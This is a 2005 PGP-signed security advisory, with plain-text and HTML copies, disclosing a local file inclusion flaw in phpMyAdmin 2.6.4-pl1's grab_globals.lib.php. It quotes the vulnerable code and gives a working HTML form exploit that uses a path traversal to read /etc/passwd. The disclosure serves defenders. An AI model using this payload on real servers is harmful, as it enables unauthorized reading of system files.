--Boundary-00=_A/oSDPpggmc0vcj
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).18
Date: 10.10.2005
from SECURITYREASON.COM

- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is very dangerous script.

- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php

This file is included by many files. Example file index.php

- -index.php--
<?php
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * Gets core libraries and defines some variables
 */
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
- -index.php--

ok so. In ./libraries/grab_globals.lib.php we have:

- -101-104-grab_globals.lib.php---------
if ( ! empty( $__redirect ) ) {
    require('./' . $__redirect);
    exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php---------

But before we have

- -53-67-grab_globals.lib.php-----------
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
    // if a subform is present and should be used
    // the rest of the form is deprecated
    $subform_id = key( $_POST['usesubform'] );
    $subform    = $_POST['subform'][$subform_id];
    $_POST      = $subform;
    if ( isset( $_POST['redirect'] ) 
      && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
        $__redirect = $_POST['redirect'];
        unset( $_POST['redirect'] );
    } // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php-----------

If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).

    $subform    = $_POST['subform'][$subform_id];
    $_POST      = $subform;

where array $_POST = array $_POST[subform][1]
that
$_POST['redirect']=$_POST[subform][1][redirect]

and we have local file inclusion.

Example response in html:

- -Exploit---
<CENTER>
<A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
- -Exploit---

Exploit:
http://securityreason.com/achievement_exploitalert/2

- --- 2. Greets ---

sp3x

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T
cvqCRiRlK9XrQGvV3sYxzXQ=
=yoDY
-----END PGP SIGNATURE-----

--Boundary-00=_A/oSDPpggmc0vcj
Content-Type: text/html;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit

<html><head><meta name="qrichtext" content="1" /></head><body style="font-size:12pt;font-family:Luxi Mono">
<p>-----BEGIN PGP SIGNED MESSAGE-----</p>
<p>Hash: SHA1</p>
<p></p>
<p>[phpMyAdmin Local file inclusion 2.6.4-pl1]</p>
<p></p>
<p>Author: Maksymilian Arciemowicz ( cXIb8O3 ).18</p>
<p>Date: 10.10.2005</p>
<p>from SECURITYREASON.COM</p>
<p></p>
<p>- --- 0.Description ---</p>
<p>phpMyAdmin 2.6.4 is a tool written in PHP intended to</p>
<p>handle the administration of MySQL over the Web.</p>
<p>Currently it can create and drop databases,</p>
<p>create/drop/alter tables, delete/edit/add fields,</p>
<p>execute any SQL statement, manage keys on fields.</p>
<p>blablabla...</p>
<p>phpMyAdmin is very dangerous script.</p>
<p></p>
<p>- --- 1. Local file inclusion (Critical) ---</p>
<p>File: ./libraries/grab_globals.lib.php</p>
<p></p>
<p>This file is included by many files. Example file index.php</p>
<p></p>
<p>- -index.php--</p>
<p>&lt;?php</p>
<p>/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */</p>
<p>// vim: expandtab sw=4 ts=4 sts=4:</p>
<p></p>
<p>/**</p>
<p> * Gets core libraries and defines some variables</p>
<p> */</p>
<p>require_once('./libraries/grab_globals.lib.php');</p>
<p>require_once('./libraries/common.lib.php');</p>
<p>...</p>
<p>- -index.php--</p>
<p></p>
<p>ok so. In ./libraries/grab_globals.lib.php we have:</p>
<p></p>
<p>- -101-104-grab_globals.lib.php---------</p>
<p>if ( ! empty( $__redirect ) ) {</p>
<p>    require('./' . $__redirect);</p>
<p>    exit();</p>
<p>} // end if ( ! empty( $__redirect ) )</p>
<p>- -101-104-grab_globals.lib.php---------</p>
<p></p>
<p>But before we have</p>
<p></p>
<p>- -53-67-grab_globals.lib.php-----------</p>
<p>// check if a subform is submitted</p>
<p>$__redirect = NULL;</p>
<p>if ( isset( $_POST['usesubform'] ) ) {</p>
<p>    // if a subform is present and should be used</p>
<p>    // the rest of the form is deprecated</p>
<p>    $subform_id = key( $_POST['usesubform'] );</p>
<p>    $subform    = $_POST['subform'][$subform_id];</p>
<p>    $_POST      = $subform;</p>
<p>    if ( isset( $_POST['redirect'] ) </p>
<p>      &amp;&amp; $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {</p>
<p>        $__redirect = $_POST['redirect'];</p>
<p>        unset( $_POST['redirect'] );</p>
<p>    } // end if ( isset( $_POST['redirect'] ) )</p>
<p>} // end if ( isset( $_POST['usesubform'] ) )</p>
<p>// end check if a subform is submitted</p>
<p>- -53-67-grab_globals.lib.php-----------</p>
<p></p>
<p>If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).</p>
<p></p>
<p>    $subform    = $_POST['subform'][$subform_id];</p>
<p>    $_POST      = $subform;</p>
<p></p>
<p>where array $_POST = array $_POST[subform][1]</p>
<p>that</p>
<p>$_POST['redirect']=$_POST[subform][1][redirect]</p>
<p></p>
<p>and we have local file inclusion.</p>
<p></p>
<p>Example response in html:</p>
<p></p>
<p>- -Exploit---</p>
<p>&lt;CENTER&gt;</p>
<p>&lt;A HREF=&quot;http://www.securityreason.com&gt;&lt;IMG SRC=&quot;http://securityreason.com/gfx/small_logo.png&quot;&gt;&lt;/A&gt;&lt;P&gt;</p>
<p>&lt;FORM action=&quot;http://localhost/phpMyAdmin-2.6.4-pl1/index.php&quot; method=post enctype=&quot;multipart/form-data&quot;&gt;</p>
<p>&lt;input TYPE=&quot;hidden&quot; name=&quot;usesubform[1]&quot; value=&quot;1&quot;&gt;</p>
<p>&lt;input TYPE=&quot;hidden&quot; name=&quot;usesubform[2]&quot; value=&quot;1&quot;&gt;</p>
<p>&lt;input TYPE=&quot;text&quot; name=&quot;subform[1][redirect]&quot; value=&quot;../../../../../../../etc/passwd&quot; size=30&gt; File&lt;p&gt;</p>
<p>&lt;input TYPE=&quot;hidden&quot; name=&quot;subform[1][cXIb8O3]&quot; value=&quot;1&quot;&gt;</p>
<p>&lt;input TYPE=&quot;submit&quot; value=&quot;Exploit&quot;&gt;</p>
<p>&lt;/FORM&gt;</p>
<p>- -Exploit---</p>
<p></p>
<p>Exploit:</p>
<p>http://securityreason.com/achievement_exploitalert/2</p>
<p></p>
<p>- --- 2. Greets ---</p>
<p></p>
<p>sp3x</p>
<p></p>
<p>- --- 3.Contact ---</p>
<p>Author: Maksymilian Arciemowicz &lt; cXIb8O3 &gt;</p>
<p>Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com</p>
<p>GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg</p>
<p>WWW: http://securityreason.com</p>
<p>-----BEGIN PGP SIGNATURE-----</p>
<p>Version: GnuPG v1.4.2 (FreeBSD)</p>
<p></p>
<p>iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T</p>
<p>cvqCRiRlK9XrQGvV3sYxzXQ=</p>
<p>=yoDY</p>
<p>-----END PGP SIGNATURE-----</p>
<p></p>
</body></html>
--Boundary-00=_A/oSDPpggmc0vcj--